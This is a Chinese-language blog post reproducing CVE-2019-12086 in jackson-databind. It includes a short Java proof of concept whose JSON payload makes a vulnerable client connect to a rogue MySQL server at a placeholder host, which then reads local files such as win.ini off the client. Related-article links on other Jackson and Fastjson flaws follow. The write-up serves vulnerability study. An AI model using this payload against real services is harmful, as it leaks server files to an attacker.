java jackson漏洞_CVE-2019-12086 jackson任意文件读取漏洞

最新推荐文章于 2024-05-20 12:42:00 发布
最新推荐文章于 2024-05-20 12:42:00 发布
阅读量831 收藏
点赞数
文章标签: java jackson漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42423349/article/details/114187392
版权

漏洞说明

CVE-2019-12086:在2.9.9之前的FasterXML jackson-databind 2.x中发现了漏洞。在开启Default Typing的情况下,且classpath中存在mysql-connector-java 8.0.15版本(2019.2.1发布)以下,攻击者可以通过发送恶意json数据读取任意文件。

环境搭建

引入jar包:

CVE-2019-12086 POC

首先创建一个恶意的MySQL,可以使用https://github.com/Gifts/Rogue-MySql-Server。这个server读取客户端文件,并写入到mysql.log中。

假设启动在ip:X.X.X.X上面,那么在客户端执行如下代码,执行代码所在的机器上的c:\windows\win.ini(修改rogue_mysql_server.py中的

filelist)文件内容就会出现在mysql.log中。

ObjectMapper om = new ObjectMapper();

om.enableDefaultTyping();

String poc = "[\"com.mysql.cj.jdbc.admin.MiniAdmin\", \"jdbc:mysql://X.X.X.X:3306/db\"]";

Object obj = om.readValue(poc, Object.class);

在服务器端启动恶意的MySQL服务,需要先关闭自己的mysql服务(如果开启了的话)

python rogue_mysql_server.py

在客户端运行poc,服务端读取到文件内容

d00fdcc77d4c3f2d6d5d801b09529255.png

注意事项

在开启Default Typing的情况下,jackson在反序列化json时,可以反序列化指定类,且可以指定一个基础类型的值作为这个类的构造函数的参数的值。

com.mysql.cj.jdbc.admin.MiniAdmin的构造函数接受一个string的值,这个值代表jdbcURL,com.mysql.cj.jdbc.admin.MiniAdmin类在初始化会连接这个jdbcURL中指定的MySQL数据库。

在mysql-connector-java (6.0.3-8.0.15)版本,恶意MySQL服务器可以读取MySQL客户端的任意本地文件,从而导致漏洞产生。

为什么需要6.0.3以上?

1、classpath下需要有mysql-connector-java.jar,且需要有

com.mysql.cj.jdbc.admin.MiniAdmin

1f9152599c439696e1746aa9cef67e22.png

2、在6.0.2版本中,在cj/core/config/PropertyDefinitions.class 422行,maxAllowedPacket默认为-1

615cf6541036d321919c5aa2a3c5a191.png

而6.0.3默认为65535,所以需要>=6.0.3

37758e4af4b876416b48ead42bd3b792.png

思维实验室 神祺
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Jackson-databind引发的漏洞问题分析
kshzhaohui的专栏
03-25 7680
前言 最近公司内部提供了一份应用高危漏洞的清单,其中提到了fastjson和jackson,因为之前对fastjson因为多态问题引发的反序列化问题有过了解,所以打算也做一个简单的分析。 漏洞简述 2020年08月27日,360CERT监测发现 jackson-databind 发布了 jackson-databind 序列化漏洞 的风险通告,该漏洞编号为 CVE-2020-24616 ,漏洞等级:高危,漏洞评分:7.5。 br.com.anteros:Anteros-DBCP 中存在新的反序列化利用链,
[JAVA安全]JACKSON反序列化
snowlyzz的博客
01-28 2035
JACKSON反序列化原理
CVE-2019-12086-jackson-databind-file-read
05-26
jackson-CVE-2019-12086 漏洞描述 在开启Default Typing的情况下,且classpath中存在mysql-connector-java 8.0.15版本(2019.2.1发布)以下,攻击者可以通过发送恶意json数据读取任意文件。mysql-connector-java这个库就是连接数据库时常用的mysql jdbc。 CVE描述如下: A Polymorphic Typing issue was discovered in FasterXML jackson-databind 2.x before 2.9.9. When Default Typing is enabled (either globally or for a specific property) for an externally exposed JSON endpoint, the ser
【夯实Java基础05】为什么面试官总喜欢问StringBuffer 和 StringBuilder 的区别
武哥聊编程
12-05 1035
本文已收录至我的GitHub:Java开发宝典,欢迎大家给个Star:https://github.com/eson15/javaAll 我会持续更新,欢迎star! 微信搜索:武哥聊编程,关注这个Java菜鸟~ 文章目录1. 相同点2. 不同点作者info StringBuilder 和 StringBuffer 的问题已经是老生常谈了,但是为什么还有那么多面试官喜欢问这个问题呢?不知道,我觉得是面试官太low了……???????? 不过我也来把这个知识点给大家总结一下,先说说他们的相同点。 1. 相
Fastjson漏洞CVE-2017-18349
最新发布
GalaxySpaceX的博客
05-20 1165
Fastjson漏洞CVE-2017-18349
分析Jackson的安全漏洞CVE-2019-12086
diaoxi4950的博客
06-11 925
CVE-2019-12086 Description A Polymorphic Typing issue was discovered in FasterXML jackson-databind 2.x before 2.9.9. When Default Typing is enabled (either globally or for a specific property) f...
Java反序列化漏洞笔记
战神/calmness的博客
05-10 419
Java反序列化漏洞 序列化与反序列化 定义:内存中的对象与可存储在磁盘上的持久化数据相互转换的过程。 各编程语言都存在: Java: java.io.Serializable接口、fastjson、jackson、gson PHP: serialize()、 unserialize() Python:pickle Java反序列化过程 1. 对象实例化 • sun.misc.Unsafe#allocateInstance • 通过反射调用构造函数 2. 成
Jackson 反序列化漏洞原理
王嘟嘟的博客
02-28 2868
Jackson 最基础的功能就是将制定的类 序列化 to json,然后json to 序列化的这样一个工具第三方库,正常情况下因为需要执行类进行转换,所以除非是故意留有后门,否则是不会出现问题的。但是为了处理一个情况,就是处理未知的json转换的时候,需要对多种场景进行处理。于是就有了Jackson多态机制。如:需要处理多个子类的情况。那么当json中的指定的类的seter或者无参构造方法中存在可利用点的时候,就会造成有效的反序列化攻击。也就是需要找的反序列化调用链。
Jackson 最新反序列化漏洞(CVE-2019-14361和CVE-2019-14439)
05-08
Jackson官方github仓库发布安全issue,涉及漏洞CVE-2019-14361和CVE-2019-14439,均是针对CVE-2019-12384漏洞的绕过利用方式,当用户提交一个精心构造的恶意JSON数据到WEB服务器端时,可导致远程任意代码执行。...
weblogic_cve-2019-2888:weblogic_cve-2019-2888
03-09
1)开启XXER工具python xxer.py -H 192.168.17.223 2)将xxer的poc放到xx.xml文件中,替换序列化后的数据,注入xxer的poc; java -jar weblogic_xxe.jar xx.xml 3)使用java-deserialization-exploit工具中的...
探索Jackson库的安全漏洞修复:CVE-2020-8840
gitblog_00016的博客
04-05 456
探索Jackson库的安全漏洞修复:CVE-2020-8840 项目地址:https://gitcode.com/jas502n/jackson-CVE-2020-8840 项目简介 在此GitCode仓库中,开发者jas502n分享了对Jackson库中一个关键安全漏洞CVE-2020-8840的研究和修复过程。JacksonJava最流行的JSON处理库之一,广泛应用于Web服务、后端开发等...
Jackson 远程命令执行漏洞CVE-2019-12384)
锋刃科技的博客
06-26 8158
前言 由于Jackson黑名单过滤不完整而导致,当开发人员在应用程序中通过ObjectMapper对象调用enableDefaultTyping方法时,程序就会受到此漏洞的影响,攻击者就可利用构造的包含有恶意代码的json数据包对应用进行攻击,直接获取服务器控制权限。 影响版本 Jackson-databind 2.0.0 ~2.9.9.1 环境搭建 创建一个docker-compose.yml的文件 version: '2' services: web: image: te
再爆安全漏洞,这次轮到Jackson了,竟由阿里云上报
2401_83601703的博客
03-31 286
其实上它的底层原理是利用某些类的反序列化利用链,可以绕过 jackson-databind 黑名单限制,远程攻击者通过向使用该组件的web服务接口发送特制请求包(精心构造的JSON),可以造成远程代码执行影响。对此评级没有概念?那就来个参照物比一比嘛,我把Fastjson上次(2020-05)的安全漏洞评级给你做对比:有限和广泛的的区别到底有多大,用文字不太好描述。打个比方,我觉得可类比艾滋病和新冠病毒的区别,前者对社会生态影响并不大,而后者恨不得让全球都停摆了,即使它致死率还远没有前者那么高,这就是影响范
CVE-2020-36189 jackson-databind java反序列化漏洞
mirocky的博客
10-13 2439
该方法允许json字符串中指定反序列化java对象的类名,而在使用Object、Map、List等对象时,可诱发反序列化漏洞,导致可执行任意命令。com.newrelic.agent.deps.ch.qos.logback.core.db.DriverManagerConnectionSource类中实现了url的输入和调用,通过可控的url进行payload的打入,即可依靠ObjectMapper的反序列化漏洞实现SSRF和RCE。,}]的形式,将对象的参数的类名打印,是json中的类名。
Jackson CVE-2017-17485 反序列化漏洞
王嘟嘟的博客
03-04 1039
CVE-2017-15095一样,是CVE-2017-7525黑名单绕过的漏洞,主要还是看一下绕过的调用链利用方式。涉及版本:2.8.10和2.9.x至2.9.3。
CVE-2019-12384 jackson ssrf-rce漏洞复现
ZJT6666666的博客
12-28 725
CVE-2019-12384 jackson ssrf-rce漏洞复现
Java Web 安全】jackson漏洞探究、利用、预防
qqchaozai的专栏
08-15 4740
前言 阿里云安全公告:2019年7月31日,阿里云应急响应中心监测到有安全研究人员披露Jackson最新反序列化远程代码执行漏洞(CVE-2019-14361和CVE-2019-14439)。同事说怎么jackson这类的json序列化库经常报漏洞,而且基本都是高危漏洞,这些漏洞到底怎么来的,jackson的开发程序员就这么不靠谱么?改不完的BUG?这篇文章就让我们走进jackson的世界,感受...
Jackson 最新反序列化漏洞(CVE-2019-14361和CVE-2019-144391
07-14
你提到的 Jackson 最新反序列化漏洞CVE-2019-14361 和 CVE-2019-14439。这些漏洞都是与 Jackson 库中的反序列化功能相关的安全问题。 CVE-2019-14361 是一个远程代码执行漏洞,攻击者可以通过构造恶意的序列化...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值